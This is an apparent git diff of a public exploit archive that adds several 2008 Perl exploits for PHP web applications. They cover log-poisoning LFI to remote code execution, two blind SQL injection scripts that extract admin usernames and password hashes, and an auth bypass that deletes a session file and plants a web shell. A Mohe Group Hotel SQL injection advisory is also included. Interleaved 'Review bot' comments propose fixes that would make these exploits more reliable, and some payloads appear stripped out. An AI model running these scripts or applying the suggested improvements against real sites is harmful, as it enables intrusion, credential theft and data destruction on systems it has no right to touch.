+# http://[site]/code/newsheads.php?heads=../[file]\0
+# post
+# http://[site]/code/commupdate.php (type=count&s=[file]\0)
+# ----------------------------------------------------------
+# LFI to RCE:
+# ----------------------------------------------------------
+
+use LWP::UserAgent;
+
+ system("cls");
+#system("clear");
+
+ print " -------------------------------------------------\n";
+ print " Fuzzylime CMS 3.01 LFI / RCE \n";
+ print " Powered by Cod3rZ \n";
+ print " http://cod3rz.helloweb.eu \n";
+ print " -------------------------------------------------\n";
+ print " Insert Site (http://site.com/): \n ";
+ chomp($site = );
+ print " -------------------------------------------------\n";
+ print " Insert Logs path \n ";
+ chomp($path = );
+ print " -------------------------------------------------\n";
+
+ #Infect Logs
+ $lwp = LWP::UserAgent->new;
+ $siten = $site.'/blog.php?file=';
+ $ua = $lwp->get($site.'coderz /coderz');
+ #Control
+ $ua = $lwp->get($site.$path.'%00');
+ if($ua->content =~ m/cod3rz/) {
+ print " Ok ".$site." is infected \n";
+ print " -------------------------------------------------\n";
+ print " ".$siten.$path."&cmd=[command]\\0 \n";
+ print " -------------------------------------------------\n";
+ }
+
+# milw0rm.com [2008-07-07]
diff --git a/platforms/php/webapps/6017.pl b/platforms/php/webapps/6017.pl
index 2bf7bc70e..d049fc3e0 100755
--- a/platforms/php/webapps/6017.pl
+++ b/platforms/php/webapps/6017.pl
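Review bot: The verification regex `m/cod3rz/` can never match what the poisoning request writes, because the request path is `coderz /coderz` (no `3`), so the `is infected` branch and the printed command URL are unreachable even when log poisoning succeeded; the PHP payload that presumably sat between the two markers appears to have been lost from the listing, so the script as shown is not runnable and the marker and the regex should be made to agree once it is restored. `$siten = $site.'/blog.php?file='` also yields `//blog.php` for the `http://site.com/` form the prompt asks for. The technique relies on NUL-byte truncation (`%00` here, `\0` in the header), which only works on PHP builds that accept NUL in include paths (rejected since 5.3.4); that constraint belongs in the header comment.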
@@ -1,122 +1,122 @@
-#!/usr/bin/perl -w
-#Triton CMS Pro (X-Forwarded-For) Blind SQL Injection
-#Admin's username/hash disclosure exploit
-#Benchmark() method, so take a coffee and relax
-#Coded by __GiReX__
-
-use LWP::UserAgent;
-use HTTP::Request;
-
-if(not defined $ARGV[0])
-{
- print "\nUsage: perl $0 [host] [path] [1/2]\n";
- print "Example: perl $0 localhost /tcms/\n";
- exit;
-}
-
-my $host = ($ARGV[0] =~ /^http:\/\//) ? $ARGV[0]: 'http://' . $ARGV[0];
- $host .= $ARGV[1] unless not defined $ARGV[1];
-
-my $client = new LWP::UserAgent;
-my $get = new HTTP::Request('GET', $host);
-my @cset = (97..122, 0); # Only a-z charset for username exploit if need change it
-my @cset2 = (48..57, 97..102);
-my $prefix = "tc_";
-
-my ($i, $j) = (0, 1);
-my ($user, $hash) = (undef, undef);
-
-banner();
-
-while($i != $#cset)
-{
- for($i = 0; $i <= $#cset; $i++)
- {
- my ($pre_time, $post_time) = time();
-
- info(chr($cset[$i]), "Username", $user);
- $rv = check_char($cset[$i], $j, "username");
- $post_time = time();
-
- if($post_time - $pre_time > 3 and $rv)
- {
- $user .= chr($cset[$i]);
- last;
- }
- }
-
- $j++;
-}
-
-if(not defined $user)
-{
- print STDOUT "\n\n[-] Exploit mistake: please check the benchmark and expected time\n\n";
- exit;
-}
-else
-{
- print STDOUT "\n[+] Admin Hashed Pass: \r";
-}
-
-for($j = 0; $j <= 32; $j++)
-{
- for($i = 0; $i <= $#cset2; $i++)
- {
- $pre_time = time();
-
- info(chr($cset2[$i]), "Hashed Pass", $hash);
- $rv = check_char($cset2[$i], $j, "password");
- $post_time = time();
-
- if($post_time - $pre_time > 3 and $rv)
- {
- $hash .= chr($cset2[$i]);
- last;
- }
- }
-}
-
-if(not defined $hash or length($hash) != 32)
-{
- print STDOUT "\n\n[-] Exploit mistake: please check the benchmark expected time\n\n";
-}
-else
-{
- print STDOUT "\n\n[+] Exploit terminated\n\n";
-}
-
-
-sub banner
-{
- print "\n";
- print "[+] Triton CMS Pro (X-Forwarded-For) Blind SQL Injection\n";
- print "[+] Admin's username/hash disclosure exploit\n";
- print "[+] Coded by __GiReX__\n";
- print "\n";
-}
-
-sub info
-{
- my($c, $str, $cur) = @_;
-
- $cur = '' unless defined $cur;
- print STDOUT "[+] Admin ${str}: ${cur}${c}\r";
-
- $| = 1;
-}
-
-sub check_char
-{
- my ($char, $n, $field) = @_ ;
-
- $get->header('X-Forwarded-For' => "-1' AND ".
- "CASE WHEN (SELECT ASCII(SUBSTRING(${field}, ${n}, 1)) ".
- "FROM ${prefix}members WHERE id=1)=${char} ".
- "THEN benchmark(99000000, CHAR(0)) END#");
-
- $res = $client->request($get);
-
- return $res->is_success;
-}
-
-# milw0rm.com [2008-07-07]
+#!/usr/bin/perl -w
+#Triton CMS Pro (X-Forwarded-For) Blind SQL Injection
+#Admin's username/hash disclosure exploit
+#Benchmark() method, so take a coffee and relax
+#Coded by __GiReX__
+
+use LWP::UserAgent;
+use HTTP::Request;
+
+if(not defined $ARGV[0])
+{
+ print "\nUsage: perl $0 [host] [path] [1/2]\n";
+ print "Example: perl $0 localhost /tcms/\n";
+ exit;
+}
+
+my $host = ($ARGV[0] =~ /^http:\/\//) ? $ARGV[0]: 'http://' . $ARGV[0];
+ $host .= $ARGV[1] unless not defined $ARGV[1];
+
+my $client = new LWP::UserAgent;
+my $get = new HTTP::Request('GET', $host);
+my @cset = (97..122, 0); # Only a-z charset for username exploit if need change it
+my @cset2 = (48..57, 97..102);
+my $prefix = "tc_";
+
+my ($i, $j) = (0, 1);
+my ($user, $hash) = (undef, undef);
+
+banner();
+
+while($i != $#cset)
+{
+ for($i = 0; $i <= $#cset; $i++)
+ {
+ my ($pre_time, $post_time) = time();
+
+ info(chr($cset[$i]), "Username", $user);
+ $rv = check_char($cset[$i], $j, "username");
+ $post_time = time();
+
+ if($post_time - $pre_time > 3 and $rv)
+ {
+ $user .= chr($cset[$i]);
+ last;
+ }
+ }
+
+ $j++;
+}
+
+if(not defined $user)
+{
+ print STDOUT "\n\n[-] Exploit mistake: please check the benchmark and expected time\n\n";
+ exit;
+}
+else
+{
+ print STDOUT "\n[+] Admin Hashed Pass: \r";
+}
+
+for($j = 0; $j <= 32; $j++)
+{
+ for($i = 0; $i <= $#cset2; $i++)
+ {
+ $pre_time = time();
+
+ info(chr($cset2[$i]), "Hashed Pass", $hash);
+ $rv = check_char($cset2[$i], $j, "password");
+ $post_time = time();
+
+ if($post_time - $pre_time > 3 and $rv)
+ {
+ $hash .= chr($cset2[$i]);
+ last;
+ }
+ }
+}
+
+if(not defined $hash or length($hash) != 32)
+{
+ print STDOUT "\n\n[-] Exploit mistake: please check the benchmark expected time\n\n";
+}
+else
+{
+ print STDOUT "\n\n[+] Exploit terminated\n\n";
+}
+
+
+sub banner
+{
+ print "\n";
+ print "[+] Triton CMS Pro (X-Forwarded-For) Blind SQL Injection\n";
+ print "[+] Admin's username/hash disclosure exploit\n";
+ print "[+] Coded by __GiReX__\n";
+ print "\n";
+}
+
+sub info
+{
+ my($c, $str, $cur) = @_;
+
+ $cur = '' unless defined $cur;
+ print STDOUT "[+] Admin ${str}: ${cur}${c}\r";
+
+ $| = 1;
+}
+
+sub check_char
+{
+ my ($char, $n, $field) = @_ ;
+
+ $get->header('X-Forwarded-For' => "-1' AND ".
+ "CASE WHEN (SELECT ASCII(SUBSTRING(${field}, ${n}, 1)) ".
+ "FROM ${prefix}members WHERE id=1)=${char} ".
+ "THEN benchmark(99000000, CHAR(0)) END#");
+
+ $res = $client->request($get);
+
+ return $res->is_success;
+}
+
+# milw0rm.com [2008-07-07]
diff --git a/platforms/php/webapps/6018.pl b/platforms/php/webapps/6018.pl
index 796a213d4..889cbe8b0 100755
--- a/platforms/php/webapps/6018.pl
+++ b/platforms/php/webapps/6018.pl
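Review bot: The username loop `while($i != $#cset)` has no exit on a missed position: when no character clears the `> 3` whole-second threshold the inner `for` leaves `$i` at `$#cset + 1`, so a single mis-timed round keeps the script issuing `benchmark(99000000, CHAR(0))` queries against the target forever instead of reaching the `not defined $user` failure report. Bounding it, e.g. `while($i != $#cset and $j <= 32)`, and treating a round with no match as an error would make the extraction terminate. The hash phase `for($j = 0; $j <= 32; $j++)` also probes position 0, which `SUBSTRING` treats as an empty string, so its first 16 requests can never match; start at `$j = 1`. Since every probe burns real CPU on the target's database, the header comment should warn that this is a load-inducing technique.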
@@ -1,180 +1,180 @@ -#!/usr/bin/perl -# -# Neutrino 0.8.4 Atomic Edition Perl exploit -# -# discovered & written by Ams -# ax330d@gmail.com -# -# DESCRIPTION: -# First exploit destroys "/data/sess.php" file (simply strips tags), -# then we are able to bypass authorization and using admin privelegies -# our exploit uploads basic shell to "/data/pages/shell_name" and deletes "/data/sess.php". -# Admin will not see that "/data/sess.php" is deleted (it will be restored back in new auth). -# -# USAGE: -# Run exploit :perl expl.pl http://www.site.com -# -# NEEDED: -# regardless php.ini settings... -# -# GREETZ :P -# Goes to... SLV, to he ( he knows who =)) and -# others whom do i know =) -# - -use strict; -use IO::Socket; - -print "\n\t~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ - \n\t\t Neutrino 0.8.4 Atomic Edition exploit - \n\t~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n\n"; - -if(@ARGV<1){ - die "\n\tUsage:\texpl.pl [host]\n\n - \n\tExample:\texpl.pl http://localhost/blog/\n\n"; -} - -my $expl_url = $ARGV[0]; -my $shell = q~ - -~; -my $shell_name = 'eof.php'; # or any desired - -print "\n\t[~] Starting exploit...\n"; - -if($expl_url =~ m#http://#){ - exploit($expl_url); -} else { - exploit('http://'.$expl_url); -} - -sub exploit { - - # Defining... - my $site = pop @_; - my ($a, $b, $c, @d) = split /\//,$site; - my $path = join('/',@d); - my $host = $c; - if($path) {$path = '/'.$path;} - my ($length, $packet, $config, $injection); - - # Revealing /data/sess.php... - print "\n\t[~] Modifying '/data/sess.php'..."; - $injection = "action=usb&mail=-|\\?|-&p=../sess.php%00"; - $length = length($injection); - $packet = "POST $path/index.php HTTP/1.1\r\n"; - $packet .= "Host: $host\r\n"; - $packet .= "Connection: Close\r\n"; - $packet .= "Content-Type: application/x-www-form-urlencoded\r\n"; - $packet .= "Content-Length: $length\r\n\r\n"; - $packet .= "$injection"; - if( ! 
send_surprise($host, $packet)){ - die("\n\t[-] Unable to connect to http://$host\n\n"); - } - sleep(1); - - # Let's cover up traces... - $injection = "action=del_pag&pg=../sess.php%00"; - $length = length($injection); - $packet = "POST $path/index.php HTTP/1.1\r\n"; - $packet .= "Host: $host\r\n"; - $packet .= "Connection: Close\r\n"; - $packet .= "Cookie: sid= \r\n"; - $packet .= "Content-Type: application/x-www-form-urlencoded\r\n"; - $packet .= "Content-Length: $length\r\n\r\n"; - $packet .= "$injection"; - print "\n\t[~] Covering up traces (deleting sess.php) ..."; - if( ! send_surprise($host,$packet)) { - die("\n\t[-] Unable to connect to http://$host\n\n"); - } - sleep(1); - - # Bypassing auth, creating shell, copying "/data/sess.php"... - print "\n\t[~] Bypassing auth, creating shell..."; - $injection = "action=new_pag&title=$shell_name&text=$shell"; - $length = length($injection); - $packet = "POST $path/index.php HTTP/1.1\r\n"; - $packet .= "Host: $host\r\n"; - $packet .= "Connection: close\r\n"; - $packet .= "Cookie: sid= \r\n"; - $packet .= "Content-Type: application/x-www-form-urlencoded\r\n"; - $packet .= "Content-Length: $length\r\n\r\n"; - $packet .= $injection; - if( ! send_surprise($host,$packet)){ - die("\n\t[-] Unable to connect to http://$host\n\n"); - } - sleep(1); - - # Finally check for shell - print "\n\t[~] Checking for shell..."; - $packet = "POST $path/data/pages/$shell_name HTTP/1.1\r\n"; - $packet .= "Host: $host\r\n"; - $packet .= "Connection: Close\r\n\r\n"; - if( ! (my $dat = send_surprise($host,$packet,1))){ - die("\n\t[-] Unable to connect to http://$host (check for shell yourself in $path/data/pages/$shell_name)\n\n"); - } else { - if ($dat =~ /200 OK/){ - print "\n\t[+] Exploited! (check /data/pages/$shell_name)\n\n"; - } else { - print "\n\t[-] Exploiting failed... 
(but still check /data/pages/$shell_name =))\n\n"; - } - } -} - -sub send_surprise(){ - - my $dat = 1; - my ($host, $packet, $ret) = @_; - my $socket=IO::Socket::INET->new( - Proto=>"tcp", - PeerAddr=>$host, - PeerPort=>"80" - ); - if( ! $socket){ - return 0; - } else { - - print $socket $packet; - if($ret){ - my $rcv; - while($rcv = <$socket>){ - $dat .= $rcv; - } - } - close ($socket); - return $dat; - } -} - -# milw0rm.com [2008-07-07] +#!/usr/bin/perl +# +# Neutrino 0.8.4 Atomic Edition Perl exploit +# +# discovered & written by Ams +# ax330d@gmail.com +# +# DESCRIPTION: +# First exploit destroys "/data/sess.php" file (simply strips tags), +# then we are able to bypass authorization and using admin privelegies +# our exploit uploads basic shell to "/data/pages/shell_name" and deletes "/data/sess.php". +# Admin will not see that "/data/sess.php" is deleted (it will be restored back in new auth). +# +# USAGE: +# Run exploit :perl expl.pl http://www.site.com +# +# NEEDED: +# regardless php.ini settings... +# +# GREETZ :P +# Goes to... SLV, to he ( he knows who =)) and +# others whom do i know =) +# + +use strict; +use IO::Socket; + +print "\n\t~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ + \n\t\t Neutrino 0.8.4 Atomic Edition exploit + \n\t~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n\n"; + +if(@ARGV<1){ + die "\n\tUsage:\texpl.pl [host]\n\n + \n\tExample:\texpl.pl http://localhost/blog/\n\n"; +} + +my $expl_url = $ARGV[0]; +my $shell = q~ + +~; +my $shell_name = 'eof.php'; # or any desired + +print "\n\t[~] Starting exploit...\n"; + +if($expl_url =~ m#http://#){ + exploit($expl_url); +} else { + exploit('http://'.$expl_url); +} + +sub exploit { + + # Defining... + my $site = pop @_; + my ($a, $b, $c, @d) = split /\//,$site; + my $path = join('/',@d); + my $host = $c; + if($path) {$path = '/'.$path;} + my ($length, $packet, $config, $injection); + + # Revealing /data/sess.php... 
+ print "\n\t[~] Modifying '/data/sess.php'..."; + $injection = "action=usb&mail=-|\\?|-&p=../sess.php%00"; + $length = length($injection); + $packet = "POST $path/index.php HTTP/1.1\r\n"; + $packet .= "Host: $host\r\n"; + $packet .= "Connection: Close\r\n"; + $packet .= "Content-Type: application/x-www-form-urlencoded\r\n"; + $packet .= "Content-Length: $length\r\n\r\n"; + $packet .= "$injection"; + if( ! send_surprise($host, $packet)){ + die("\n\t[-] Unable to connect to http://$host\n\n"); + } + sleep(1); + + # Let's cover up traces... + $injection = "action=del_pag&pg=../sess.php%00"; + $length = length($injection); + $packet = "POST $path/index.php HTTP/1.1\r\n"; + $packet .= "Host: $host\r\n"; + $packet .= "Connection: Close\r\n"; + $packet .= "Cookie: sid= \r\n"; + $packet .= "Content-Type: application/x-www-form-urlencoded\r\n"; + $packet .= "Content-Length: $length\r\n\r\n"; + $packet .= "$injection"; + print "\n\t[~] Covering up traces (deleting sess.php) ..."; + if( ! send_surprise($host,$packet)) { + die("\n\t[-] Unable to connect to http://$host\n\n"); + } + sleep(1); + + # Bypassing auth, creating shell, copying "/data/sess.php"... + print "\n\t[~] Bypassing auth, creating shell..."; + $injection = "action=new_pag&title=$shell_name&text=$shell"; + $length = length($injection); + $packet = "POST $path/index.php HTTP/1.1\r\n"; + $packet .= "Host: $host\r\n"; + $packet .= "Connection: close\r\n"; + $packet .= "Cookie: sid= \r\n"; + $packet .= "Content-Type: application/x-www-form-urlencoded\r\n"; + $packet .= "Content-Length: $length\r\n\r\n"; + $packet .= $injection; + if( ! send_surprise($host,$packet)){ + die("\n\t[-] Unable to connect to http://$host\n\n"); + } + sleep(1); + + # Finally check for shell + print "\n\t[~] Checking for shell..."; + $packet = "POST $path/data/pages/$shell_name HTTP/1.1\r\n"; + $packet .= "Host: $host\r\n"; + $packet .= "Connection: Close\r\n\r\n"; + if( ! 
(my $dat = send_surprise($host,$packet,1))){ + die("\n\t[-] Unable to connect to http://$host (check for shell yourself in $path/data/pages/$shell_name)\n\n"); + } else { + if ($dat =~ /200 OK/){ + print "\n\t[+] Exploited! (check /data/pages/$shell_name)\n\n"; + } else { + print "\n\t[-] Exploiting failed... (but still check /data/pages/$shell_name =))\n\n"; + } + } +} + +sub send_surprise(){ + + my $dat = 1; + my ($host, $packet, $ret) = @_; + my $socket=IO::Socket::INET->new( + Proto=>"tcp", + PeerAddr=>$host, + PeerPort=>"80" + ); + if( ! $socket){ + return 0; + } else { + + print $socket $packet; + if($ret){ + my $rcv; + while($rcv = <$socket>){ + $dat .= $rcv; + } + } + close ($socket); + return $dat; + } +} + +# milw0rm.com [2008-07-07] diff --git a/platforms/php/webapps/6019.pl b/platforms/php/webapps/6019.pl index 7d812a452..8eceefb18 100755 --- a/platforms/php/webapps/6019.pl +++ b/platforms/php/webapps/6019.pl 
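Review bot: The responses to the two requests that overwrite and then delete `data/sess.php` are never read — `send_surprise` is called without its third argument there, so it returns the constant `1` and only a failed TCP connect is noticed — and the script proceeds blind to the destructive delete and the page upload. Passing `1` as `$ret` for those calls and checking the status line before continuing would avoid deleting the session file after a 403/500 on the first step, when the auth bypass cannot have worked. The final `$dat =~ /200 OK/` check also only shows the page exists, not that `$shell` executed, and the `$shell` heredoc in the listing is empty, which looks like an extraction artifact. The header comment should state that the script intentionally destroys the target's session store, so it must not be run outside an authorised engagement.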
@@ -1,210 +1,210 @@ -#!/usr/bin/perl -W - -# SmartPPC Pay Per Click Script Blind SQL Injection Exploit -# File affected: directory.php ($idDirectory) -# -# Vulnerability: Hamtaro -# Exploit: ka0x -# -# -# ka0x@domlabs:~$ ./smartppc.pl -u "http://localhost/directory.php?username=&idDirectory=2" -p Top -# [i] Getting default: -T 30 -# [i] Getting default: -l 200 -# [i] Getting default: -t 15 -# 18 118 v -# [!] $EXIT_IF_NO_CHAR : I can't find a valid character, position 18. -# [i] USER / PASSWORD: -# ka0x / test12345_ -# - -# special thanks: NullWave07, an0de, Piker, Xarnuz - - -my $MAX_FIELD_LENGTH = 200 ; -my $EXIT_IF_NO_CHAR = 1 ; -my $DEFAULT_THREADS = 15 ; -my $DEFAULT_THREADS_TIMEOUT = 30 ; -my @ascii = ( 32 .. 123 ) ; -my $DEFAULT_THREADS_TIME = 1 ; - - -use LWP::UserAgent ; - -sub _HELP_AND_EXIT -{ - die " - - ./$0 -u -p - - Options: - -u Ex: http://localhost/directory.php?username=&idDirectory=58 - -p HTML pattern. - - Other: - -t <#> Threads, default '$DEFAULT_THREADS'. - -l <#> Maximum table name length '$MAX_FIELD_LENGTH'. - -T <#> Timeout. - -h Help (also with --help). - - Example: - - ./$0 -u \"http://localhost/directory.php?username=&idDirectory=2\" -p Top - -" ; -} - - - my ($p, $w) = ({ @ARGV }, { }) ; - - map { - &_HELP_AND_EXIT if $_ eq '--help' or $_ eq '-h' ; - } keys %$p ; - - map { - die "[!] Require: $_\n[!] Help: ./$0 --help\n" unless $p->{ $_ } ; - } qw/-u -p/ ; - - $p->{'-t'} = ( $p->{'-t'} and $p->{'-t'} =~ /^\d+$/ ) ? $p->{'-t'} : ( $w->{'-t'} = $DEFAULT_THREADS ) ; - $p->{'-l'} = ( $p->{'-l'} and $p->{'-l'} =~ /^\d+$/ ) ? $p->{'-l'} : ( $w->{'-l'} = $MAX_FIELD_LENGTH ) ; - $p->{'-T'} = ( $p->{'-T'} and $p->{'-T'} =~ /^\d+$/ ) ? $p->{'-T'} : ( $w->{'-T'} = $DEFAULT_THREADS_TIMEOUT ) ; - - map { - warn "[i] Getting default: $_ $w->{ $_ }\n" ; - } sort keys %$w ; - - ( &_IS_VULN( $p ) ) ? &_START_WORK( $p ) : die "[i] Bad pattern ? 
Isn't vulnerable ?\n" ; - - - - -sub _START_WORK -{ - my $p = shift ; - - my $position = 1 ; - - pipe(R, W) ; - pipe(Rs, Ws) ; - autoflush STDOUT 1 ; - - my $sql_message = '' ; - my $msg = '' ; - my @pid ; - - while( $position <= $p->{'-l'} ) - { - my $cf ; - unless( $cf = fork ){ &_CHECKING( $p, $position ) ; exit(0) ; } - push(@pid, $cf) ; - - my $count = 0 ; - my $can_exit ; - my $char_printed ; - - while() - { - chomp ; - push(@pid, (split(/:/))[1] ) if /^pid/ ; - - my ($res, $pos, $ascii) = ( split(/ /, $_) ) ; - $count++ if $pos == $position ; - - print "\b" x length($msg), ($msg = "$position $ascii " . chr($ascii) ) ; - - if( $res eq 'yes' and $pos == $position ){ - $char_printed = $can_exit = 1 ; - print Ws "STOP $position\n" ; - $sql_message .= chr( $ascii ) ; - } - - last if ( $can_exit or $count == @ascii ); - } - - map { waitpid($_, 0) } @pid ; - - unless( $char_printed ) - { - if( $EXIT_IF_NO_CHAR ) - { - warn "\n[!] \$EXIT_IF_NO_CHAR : I can't find a valid character, position $position.\n" ; - last ; - } - } - - $position++ ; - } - - print "[i] USER / PASSWORD:\n$sql_message\n" ; - -} - -sub _CHECKING -{ - my ($p, $position) = @_ ; - my $counter = 0 ; - my $stop_position ; - - foreach my $ascii ( @ascii ) - { - $counter++ ; - - if( $counter % $p->{'-t'} == 0 ) - { - my $stop_position ; - eval - { - $SIG{'ALRM'} = sub { die "non_stop\n" } ; - alarm $DEFAULT_THREADS_TIME ; - my $line = ; - $stop_position = (split( / /, $line))[1] ; - alarm 0 ; - } ; - - if( ($stop_position) and $stop_position == $position ){ print "\nnext position\n" ; exit(0) ; } - } - - unless(my $pid = fork ) - { - print Ws "pid:$pid\n" or die ; - - - my $url = $p->{'-u'} . - ' AND ascii(substring((SELECT CONCAT(username,0x202f20,pass) FROM users LIMIT 0,1),' . $position . ',1))='. $ascii ; - - my $ua = LWP::UserAgent->new ; - $ua->timeout( $p->{'-T'} ) ; - - my $content ; - while( 1 ) - { - last if $content = $ua->get( $url )->content ; - } - - ( $content =~ /$p->{'-p'}/ ) ? 
print W "yes $position $ascii\n" : print W "no $position $ascii\n" ; - - exit( 0 ) ; - } - - } -} - - - -sub _IS_VULN -{ - my $p = shift ; - - my $ua = LWP::UserAgent->new ; - $ua->timeout( $p->{'-T'} ) ; - - my ( $one, $two ) = ( - $ua->get( $p->{'-u'}." AND 1=1")->content , - $ua->get( $p->{'-u'}." AND 1=2")->content , - ) ; - - return ($one =~ /$p->{'-p'}/ and $two !~ /$p->{'-p'}/) ? 1 : undef ; -} - -__END__ - -# milw0rm.com [2008-07-07] +#!/usr/bin/perl -W + +# SmartPPC Pay Per Click Script Blind SQL Injection Exploit +# File affected: directory.php ($idDirectory) +# +# Vulnerability: Hamtaro +# Exploit: ka0x +# +# +# ka0x@domlabs:~$ ./smartppc.pl -u "http://localhost/directory.php?username=&idDirectory=2" -p Top +# [i] Getting default: -T 30 +# [i] Getting default: -l 200 +# [i] Getting default: -t 15 +# 18 118 v +# [!] $EXIT_IF_NO_CHAR : I can't find a valid character, position 18. +# [i] USER / PASSWORD: +# ka0x / test12345_ +# + +# special thanks: NullWave07, an0de, Piker, Xarnuz + + +my $MAX_FIELD_LENGTH = 200 ; +my $EXIT_IF_NO_CHAR = 1 ; +my $DEFAULT_THREADS = 15 ; +my $DEFAULT_THREADS_TIMEOUT = 30 ; +my @ascii = ( 32 .. 123 ) ; +my $DEFAULT_THREADS_TIME = 1 ; + + +use LWP::UserAgent ; + +sub _HELP_AND_EXIT +{ + die " + + ./$0 -u -p + + Options: + -u Ex: http://localhost/directory.php?username=&idDirectory=58 + -p HTML pattern. + + Other: + -t <#> Threads, default '$DEFAULT_THREADS'. + -l <#> Maximum table name length '$MAX_FIELD_LENGTH'. + -T <#> Timeout. + -h Help (also with --help). + + Example: + + ./$0 -u \"http://localhost/directory.php?username=&idDirectory=2\" -p Top + +" ; +} + + + my ($p, $w) = ({ @ARGV }, { }) ; + + map { + &_HELP_AND_EXIT if $_ eq '--help' or $_ eq '-h' ; + } keys %$p ; + + map { + die "[!] Require: $_\n[!] Help: ./$0 --help\n" unless $p->{ $_ } ; + } qw/-u -p/ ; + + $p->{'-t'} = ( $p->{'-t'} and $p->{'-t'} =~ /^\d+$/ ) ? 
$p->{'-t'} : ( $w->{'-t'} = $DEFAULT_THREADS ) ; + $p->{'-l'} = ( $p->{'-l'} and $p->{'-l'} =~ /^\d+$/ ) ? $p->{'-l'} : ( $w->{'-l'} = $MAX_FIELD_LENGTH ) ; + $p->{'-T'} = ( $p->{'-T'} and $p->{'-T'} =~ /^\d+$/ ) ? $p->{'-T'} : ( $w->{'-T'} = $DEFAULT_THREADS_TIMEOUT ) ; + + map { + warn "[i] Getting default: $_ $w->{ $_ }\n" ; + } sort keys %$w ; + + ( &_IS_VULN( $p ) ) ? &_START_WORK( $p ) : die "[i] Bad pattern ? Isn't vulnerable ?\n" ; + + + + +sub _START_WORK +{ + my $p = shift ; + + my $position = 1 ; + + pipe(R, W) ; + pipe(Rs, Ws) ; + autoflush STDOUT 1 ; + + my $sql_message = '' ; + my $msg = '' ; + my @pid ; + + while( $position <= $p->{'-l'} ) + { + my $cf ; + unless( $cf = fork ){ &_CHECKING( $p, $position ) ; exit(0) ; } + push(@pid, $cf) ; + + my $count = 0 ; + my $can_exit ; + my $char_printed ; + + while() + { + chomp ; + push(@pid, (split(/:/))[1] ) if /^pid/ ; + + my ($res, $pos, $ascii) = ( split(/ /, $_) ) ; + $count++ if $pos == $position ; + + print "\b" x length($msg), ($msg = "$position $ascii " . chr($ascii) ) ; + + if( $res eq 'yes' and $pos == $position ){ + $char_printed = $can_exit = 1 ; + print Ws "STOP $position\n" ; + $sql_message .= chr( $ascii ) ; + } + + last if ( $can_exit or $count == @ascii ); + } + + map { waitpid($_, 0) } @pid ; + + unless( $char_printed ) + { + if( $EXIT_IF_NO_CHAR ) + { + warn "\n[!] 
\$EXIT_IF_NO_CHAR : I can't find a valid character, position $position.\n" ; + last ; + } + } + + $position++ ; + } + + print "[i] USER / PASSWORD:\n$sql_message\n" ; + +} + +sub _CHECKING +{ + my ($p, $position) = @_ ; + my $counter = 0 ; + my $stop_position ; + + foreach my $ascii ( @ascii ) + { + $counter++ ; + + if( $counter % $p->{'-t'} == 0 ) + { + my $stop_position ; + eval + { + $SIG{'ALRM'} = sub { die "non_stop\n" } ; + alarm $DEFAULT_THREADS_TIME ; + my $line = ; + $stop_position = (split( / /, $line))[1] ; + alarm 0 ; + } ; + + if( ($stop_position) and $stop_position == $position ){ print "\nnext position\n" ; exit(0) ; } + } + + unless(my $pid = fork ) + { + print Ws "pid:$pid\n" or die ; + + + my $url = $p->{'-u'} . + ' AND ascii(substring((SELECT CONCAT(username,0x202f20,pass) FROM users LIMIT 0,1),' . $position . ',1))='. $ascii ; + + my $ua = LWP::UserAgent->new ; + $ua->timeout( $p->{'-T'} ) ; + + my $content ; + while( 1 ) + { + last if $content = $ua->get( $url )->content ; + } + + ( $content =~ /$p->{'-p'}/ ) ? print W "yes $position $ascii\n" : print W "no $position $ascii\n" ; + + exit( 0 ) ; + } + + } +} + + + +sub _IS_VULN +{ + my $p = shift ; + + my $ua = LWP::UserAgent->new ; + $ua->timeout( $p->{'-T'} ) ; + + my ( $one, $two ) = ( + $ua->get( $p->{'-u'}." AND 1=1")->content , + $ua->get( $p->{'-u'}." AND 1=2")->content , + ) ; + + return ($one =~ /$p->{'-p'}/ and $two !~ /$p->{'-p'}/) ? 1 : undef ; +} + +__END__ + +# milw0rm.com [2008-07-07] diff --git a/platforms/php/webapps/6021.txt b/platforms/php/webapps/6021.txt index 34cd2dc83..410f8898d 100755 --- a/platforms/php/webapps/6021.txt +++ b/platforms/php/webapps/6021.txt 
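Review bot: `my @ascii = ( 32 .. 123 ) ;` stops three codepoints short of printable ASCII, so a password containing `|`, `}` or `~` (124–126) produces no match at that position and the run aborts through `$EXIT_IF_NO_CHAR`; `( 32 .. 126 )` covers the full printable range. The per-character child in `_CHECKING` also retries `while( 1 ) { last if $content = $ua->get( $url )->content ; }` with no limit, so an empty or timed-out response leaves a forked process hammering the target indefinitely, and with one fork per codepoint per position that becomes a request flood; cap the retries and `exit( 0 )` on failure. The injected `AND ascii(substring(...))` clause is appended to `-u` with raw spaces and parentheses, so it is worth URL-encoding it explicitly rather than relying on LWP to normalise it.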
@@ -1,55 +1,55 @@
--[*]+================================================================================+[*]-
--[*]+ Mole Group Hotel Script 1.0 Remote SQL Injection Vulnerability +[*]-
--[*]+================================================================================+[*]-
-
-
-
-[*] Discovered By: t0pP8uZz
-[*] Discovered On: 8 JULY 2008
-[*] Script Download: http://www.mole-group.com/content/view/44/59/
-[*] DORK: N/A
-
-
-
-[*] Vendor Has Not Been Notified!
-
-
-
-[*] DESCRIPTION:
-
- Mole Group Hotel Script suffers from a insecure mysql query in the "file" variable.
- This can lead to malicous users arbitrary selecting confidential information from the database.
-
- See below for the SQL injection.
-
-
-
-[*] SQL Injection:
-
- http://site.com/index.php?file=1/**/UNION/**/ALL/**/SELECT/**/1,CONVERT(name/**/using/**/latin1),3,4/**/FROM/**/settings/*
-
-
-
-[*] NOTE/TIP:
-
- admin login is at /admin/
-
-
-
-[*] GREETZ:
-
- milw0rm.com, h4ck-y0u.org, Offensive-Security.com, CipherCrew !
-
-
-
-[-] Peace...
-
- ...t0pP8uZz !
-
-
-
--[*]+================================================================================+[*]-
--[*]+ Mole Group Hotel Script 1.0 Remote SQL Injection Vulnerability +[*]-
--[*]+================================================================================+[*]-
-
-# milw0rm.com [2008-07-08]
+-[*]+================================================================================+[*]-
+-[*]+ Mole Group Hotel Script 1.0 Remote SQL Injection Vulnerability +[*]-
+-[*]+================================================================================+[*]-
+
+
+
+[*] Discovered By: t0pP8uZz
+[*] Discovered On: 8 JULY 2008
+[*] Script Download: http://www.mole-group.com/content/view/44/59/
+[*] DORK: N/A
+
+
+
